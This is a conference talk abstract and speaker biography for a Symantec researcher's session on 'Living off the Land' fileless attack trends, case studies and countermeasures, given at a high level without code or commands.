A deep look into the recent “Living off the Land” threats in the wild

Mingwei Zhang/Symantec

In the recent years, we have been seeing an increased trend for Living off the Land (LotL) threats. This technique is not only being used in the targeted attacks, but also malicious campaigns aiming the general public. In a typical LotL attack, hacker could make use of tools that are already installed on targeted computers or the system built-in features, to load and execute malicious scripts and/or shellcode directly in memory. As a result, there are less malicious files created on the hard disk, and the malicious activities could also be hidden in a sea of legitimate processes, making such an attack less likely to be detected by security software and solutions.

Symantec Security Technology & Response group has been monitoring the changing threat landscape closely and has analyzed hundreds of LotL attacks in the recent years. In this paper, we will have a deep dive into LotL threats based on the most recent in-the-wild samples we have researched.

Firstly, we will share the telemetries and statistics to demonstrate the growing trend of LotL attacks.

Then we will discuss the common tactics used by LotL attacks, such as delivery vectors, attacking surfaces (built-in tools and features), persistent mechanism, evasion techniques and the payloads.

Next, we will have a few case studies about the notable or interesting LotL threats, such as Bluwimps, Kovter, Pandex downloader, and LNK threats.

Finally, we will share some points about the challenges posed by LotL threats, the new trend we have observed, and possible countermeasure solutions.

November 8 at 12:00 - 12:30, Stage A

Mingwei Zhang is a principal threat analysis engineer at Symantec Corporation. He joined Symantec since 2013 and woked in security technology and response team for 6 years. His tasks included malware analysis, exploit kit tracking, and malware delivery chain research. He received his master degree in computer science from National University of Singapore. Before moving to threat analysis, he has worked as research associate in NUS Temasek Laboratories. His major research topics included sophisticated memory exploit identifying & diagnosis, and kernel level loadable library isolation. Mingwei has authored a paper for NDSS 2012, co-authored a paper for ICECCS 2014. Currently, he is focused in the emulation based nonpe malware detection and fileless attack protection.